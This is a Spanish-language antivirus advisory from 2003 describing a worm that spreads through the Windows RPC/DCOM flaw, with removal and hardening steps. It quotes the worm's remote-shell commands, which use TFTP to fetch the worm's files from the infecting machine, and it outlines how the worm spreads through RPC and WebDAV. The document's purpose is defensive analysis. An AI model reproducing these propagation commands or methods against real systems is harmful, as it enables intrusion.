dllhost.exe 
svchost.exe

DLLHOST.EXE (10,240 bytes), es el componente principal del gusano.

SVCHOST.EXE (19,728 bytes) es el servidor TFTP (Trivial File Transfer Protocol), usado para transferirse a las computadoras de sus víctimas (como lo hace el Lovsan).

Note que tanto DLLHOST.EXE como SVCHOST.EXE son además nombres de archivos legítimos usados por Windows 2000 y XP, entre otros, aunque se encuentran en otros directorios.

Windows 2000 y XP tienen un cliente TFTP incorporado por defecto (TFTPD.EXE). El gusano asume que ese archivo existe en el directorio \DLLCACHE e intenta crear una copia de él como SVCHOST.EXE, en el siguiente directorio (crea la carpeta "Wins"):

c:\windows\system32\wins\svchost.exe

TFTP (Trivial File Transfer Protocol), es una versión simplificada de FTP (File Transfer Protocol), un protocolo que permite la transferencia de archivos entre dos computadoras conectadas en red.

Si TFTPD.EXE no existe, intentará descargar SVCHOST.EXE de una máquina infectada, donde el gusano también se ejecuta como un servidor TFTP usando el puerto UDP/69.

También copia su propio código (DLLHOST.EXE) en la siguiente ubicación:

c:\windows\system32\wins\dllhost.exe

NOTA: "C:\Windows" puede variar de acuerdo a la versión de Windows instalada.

Crea dos servicios de Windows, por medio del Windows Service Control Manager, "RpcPatch" y "RpcTftpd":

HKLM\System\CurrentControlSet\Services\RpcTftpd
ImagePath = c:\windows\system32\wins\svchost.exe

HKLM\System\CurrentControlSet\Services\RpcPatch
ImagePath = c:\windows\system32\wins\dllhost.exe

El servicio "RpcPatch" ejecuta la copia del gusano (despliega el nombre "WINS Client") y "RpcTftpd" ejecuta al servidor TFTP (como "Network Connections Sharing").

El gusano utiliza el mismo método del Lovsan.A para autoreplicarse a otras computadoras infectadas (falla RPC/DCOM y puerto TCP/135). Cuando accede exitosamente a éstas, valiéndose de la vulnerabilidad mencionada, crea un shell remoto (ejecutando CMD.EXE) en cualquier puerto TCP entre 666 y 765, de la máquina infectada (un SHELL es un intérprete de comandos que interpreta y activa los comandos o utilidades introducidos por el usuario).

El gusano comprueba que el dominio "microsoft.com" esté accesible, antes de enviar los siguientes comandos a la máquina remota usando el shell creado antes:

tftp -i %s get svchost.exe wins\SVCHOST.EXE
tftp -i %s get dllhost.exe wins\DLLHOST.EXE

El gusano intenta quitar al Lovsan.A (o Blaster.A), del sistema infectado. Para ello busca cualquier proceso en cuyo nombre esté presente la cadena "msblast" y la finaliza. También intenta borrar el archivo de la versión A del gusano:

\system32\msblast.exe

También examina la versión del sistema infectado, número del Service Pack instalado si existiera, y otra información similar, así como la existencia o no del parche correspondiente para la vulnerabilidad RPC/DCOM, en las siguientes ramas del registro (según el sistema):

HKLM\SOFTTWARE\Microsoft\Updates
\Windows 2000\SP5\KB823980

HKLM\SOFTTWARE\Microsoft\Updates
\Windows XP\SP1\KB823980

HKLM\SOFTTWARE\Microsoft\Updates
\Windows XP\SP2\KB823980

Si no existe por lo menos alguna de éstas entradas, intenta descargar y ejecutar dicha actualización del sitio de Microsoft, desde ocho direcciones diferentes, correspondientes a las versiones en inglés, coreana y las dos chinas, tanto para Windows 2000 como para XP (32 bits). Si el sistema infectado está en español, no descarga el parche, o lo hace con la versión en inglés, lo que puede causar problemas posteriores si se llega a instalar.

Después de descargar e instalar el parche, reinicia el sistema.

El gusano crea un mutex llamado "RpcPatch_Mutex" para asegurarse ser la única copia activa en memoria.

En su código, puede verse el siguiente texto, que nunca es mostrado:

=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice: 2004 will remove myself:)~~ sorry zhongli~~~ =========== wins

Como expresa el mensaje, el gusano se autoelimina del equipo infectado, si la fecha del sistema es 1 de enero de 2004 o superior.

Otra característica de este gusano, es que intenta infectar servidores Microsoft Internet Information Server 5.0 (IIS), explotando la vulnerabilidad descripta en el boletín MS03-007 (ver http://www.vsantivirus.com/vulms03-007.htm), y para la cuál existe un parche desde marzo de 2003. Utiliza el puerto TCP/80 para buscar equipos que estén ejecutando Microsoft IIS 5.0 y sean vulnerables.

La falla permite que enviando un paquete HTTP especialmente formado a una máquina con IIS, puede lograrse la caída del servidor, o incluso la ejecución de código arbitrario bajo el contexto de seguridad local del equipo afectado. Esta vulnerabilidad se produce por un desbordamiento de búfer en la librería NTDLL.DLL del componente WebDAV (World Wide Web Distributed Authoring and Versioning) que funciona bajo ISS. Se compone de un conjunto de extensiones de HTTP que permiten a los usuarios manipular archivos almacenados en un servidor Web (RFC2518).

Como resultado de toda la actividad del gusano, la subred local será saturada con pedidos al puerto 135, y aumentará el tráfico global de paquetes ICMP. ICMP (Protocolo de mensajes de control de Internet), es una extensión del Protocolo de Internet (IP), y permite generar mensajes de error, paquetes de prueba y mensajes informativos relacionados con IP. Básicamente, se usa para comprobar la existencia de la máquina consultada, en este caso, usados por el gusano para detectar máquinas vulnerables, etc.

Como en el caso del Lovsan, debido a un error en el exploit utilizado para aprovecharse de la falla mencionada, en Windows XP, cada vez que se reinicia un equipo infectado, puede mostrarse el siguiente mensaje antes de que el sistema se vuelva a cerrar:

Apagar el sistema

Se está apagando el sistema. Guarde todo
trabajo en curso y cierre la sesión. Se perderá
cualquier cambio que no haya sido guardado.
El apagado ha sido iniciado por NT
AUTORITHY\SYSTEM

Tiempo restante
para el apagado: xx:xx:xx

Mensaje
Windows debe reiniciar ahora porque el
servicio Llamada a procedimiento
remoto (RPC) terminó de forma inesperada

IMPORTANTE: Se debe tener en cuenta que este mensaje no es exclusivo de este gusano, sino de cualquier código maligno que se aproveche de ciertos exploits para la vulnerabilidad DCOM/RPC. Además de ello, recuerde que existen otros exploits que no producen este mensaje.


Recomendaciones:

º Instalar parches descriptos en el siguiente artículo:

Vulnerabilidad RPC/DCOM: MS03-026
http://www.vsantivirus.com/vulms03-026-027-028.htm


º Filtrar con un cortafuegos los siguientes puertos:

udp/135
udp/137
udp/138
tcp/135
tcp/445
tcp/593
tcp/69
udp/69

Reparación manual

IMPORTANTE: La reparación (manual y automática), se ofrece solo como una forma segura de acceder a nuestros archivos en forma temporal, inclusive para poder realizar algunos respaldos de información que no hayamos hecho antes de la infección. Lamentablemente la infección con este gusano (como con el Lovsan), amerita acciones más drásticas, como formatear y reinstalar el sistema operativo. Estas razones se explican exhaustivamente en el siguiente enlace de "Preguntas frecuentes sobre el Lovsan (Blaster)", "¿Porqué formatear después del Lovsan (Blaster)?", http://www.vsantivirus.com/faq-lovsan.htm#11


Nota: Recomendamos utilizar un programa tipo firewall (cortafuego) como el ZoneAlarm, el cuál detendrá y advertirá la conexión de este y cualquier otro troyano con Internet, así como cualquier intento de acceder a nuestro sistema.

ZoneAlarm (gratuito para su uso personal), además de ser un excelente cortafuegos, también impide la ejecución de cualquier adjunto con posibilidades de poseer virus (sin necesidad de tener que actualizarlo con cada nueva versión de un virus).

Más información:

Cómo configurar Zone Alarm 3.x
http://www.vsantivirus.com/za.htm


Deshabilitar las carpetas compartidas

Es importante desconectar cada computadora de cualquier red antes de proceder a su limpieza.


Deteniendo los servicios del gusano (Windows 2000 y XP)

1. Seleccione Inicio, Ejecutar, escriba CMD y pulse Enter

2. En la ventana de comandos, escriba la siguiente instrucción, respetando las comillas:

NET STOP "Network Connections Sharing"

Deberá salir un mensaje avisando la detención del servicio.

3. Reitere los mismos pasos con la siguiente instrucción:

NET STOP "WINS Client"

4. Cierre la ventana de comandos.


Finalizando el proceso del virus en memoria

Para eliminar manualmente este gusano de un sistema infectado, siga estos pasos:

1. Detenga el proceso del virus en memoria, pulsando CTRL+SHIFT+DEL y seleccione la lengüeta Procesos (Windows 2000 y XP).

2. En la lista de tareas, señale una de las siguientes (según la versión):

DLLHOST.EXE

3. Seleccione el botón de finalizar tarea.


Antivirus

1. Actualice sus antivirus con las últimas definiciones
2. Ejecútelos en modo escaneo, revisando todos sus discos
3. Borre los archivos detectados como infectados


Borrado manual de los archivos creados por el gusano

Desde el Explorador de Windows, localice y borre los siguientes archivos:

c:\windows\system32\wins\svchost.exe
c:\windows\system32\wins\dllhost.exe

Pinche con el botón derecho sobre el icono de la "Papelera de reciclaje" en el escritorio, y seleccione "Vaciar la papelera de reciclaje".


Editar el registro

1. Ejecute el editor de registro: Inicio, ejecutar, escriba REGEDIT y pulse ENTER

2. En el panel izquierdo del editor, pinche en el signo "+" hasta abrir la siguiente rama:

HKEY_LOCAL_MACHINE
\System
\CurrentControlSet
\Services

3. Pinche en la carpeta "Services" y borre las siguientes carpetas:

RpcTftpd
RpcPatch

4. Use "Registro", "Salir" para salir del editor y confirmar los cambios.

5. Reinicie su computadora (Inicio, Apagar el sistema, Reiniciar).


Información adicional

Vulnerabilidad en RPC (Remote Procedure Call)

Este troyano se aprovecha de un desbordamiento de búfer en la interface RPC (Remote Procedure Call) que permite la ejecución arbitraria de código. El Remote Procedure Call (RPC) permite el intercambio de información entre equipos, y está presente por defecto en el protocolo TCP bajo el puerto 135 en Windows NT 4.0, 2000 y XP.

Una falla en la parte de RPC encargada del intercambio de mensajes sobre TCP/IP, permite a un atacante ejecutar cualquier código con los privilegios locales (Mi PC).

Descargue y ejecute el parche correspondiente (MS03-026) desde el siguiente enlace:

Vulnerabilidad RPC/DCOM: MS03-026
http://www.vsantivirus.com/vulms03-026-027-028.htm


IMPORTANTE

Si usted utiliza su PC, o pertenece a una organización que por su naturaleza exige ser totalmente segura, se recomienda borrar todo el contenido del disco duro, reinstalar de cero el sistema operativo, y recuperar sus archivos importantes de copias de respaldo anteriores.

También instale los parches mencionados más adelante.

Luego cambie todas sus contraseñas, incluso la de otros usuarios a los que tenga acceso desde su computadora.

En el caso de una empresa con redes corporativas, contacte con su administrador para tomar las acciones necesarias a fin de cambiar todas las claves de acceso, así como reinstalar Windows en todas las computadoras.

Esta es la única manera segura de no comprometer su seguridad ante los posibles cambios realizados por el gusano.


Activar cortafuegos de Windows XP (Internet Conexión Firewall)

NOTA: Utilice solo un cortafuegos al mismo tiempo. Sugerimos ZoneAlarm, sin embargo, Windows XP trae su propio cortafuegos (que posee algunas limitaciones). Si instala ZA, no active ICF (Internet Conexión Firewall) o viceversa.

Para activar ICF en Windows XP, siga estos pasos:

1. Seleccione Inicio, Panel de Control, Conexiones de Red e Internet, Conexiones de Red.

2. Pinche con el botón derecho del mouse sobre "Conexión de Red de Area Local" y seleccione Propiedades.

3. En la lengüeta "Avanzadas" tilde la opción "Proteger mi equipo y mi red limitando o impidiendo el acceso a él desde Internet".

4. Seleccione Aceptar, etc.


Mostrar las extensiones verdaderas de los archivos

Para poder ver las extensiones verdaderas de los archivos y además visualizar aquellos con atributos de "Oculto", proceda así:

1. Ejecute el Explorador de Windows

2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú 'Herramientas' (Windows Me/2000/XP), y pinche en 'Opciones' u 'Opciones de carpetas'.

3. Seleccione la lengüeta 'Ver'.

4. DESMARQUE la opción "Ocultar extensiones para los tipos de archivos conocidos" o similar.

5. En Windows 95/NT, MARQUE la opción "Mostrar todos los archivos y carpetas ocultos" o similar.

En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos los archivos'.

En Windows Me/2000/XP, en 'Archivos y carpetas ocultos', MARQUE 'Mostrar todos los archivos y carpetas ocultos' y DESMARQUE 'Ocultar archivos protegidos del sistema operativo'.

6. Pinche en 'Aplicar' y en 'Aceptar'.


Limpieza de virus en Windows Me y XP

Si el sistema operativo instalado es Windows Me o Windows XP, para poder eliminar correctamente este virus de su computadora, deberá deshabilitar antes de cualquier acción, la herramienta "Restaurar sistema" como se indica en estos artículos:

Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm

Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm


Actualizaciones:

19/ago/03 (02.13)




(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com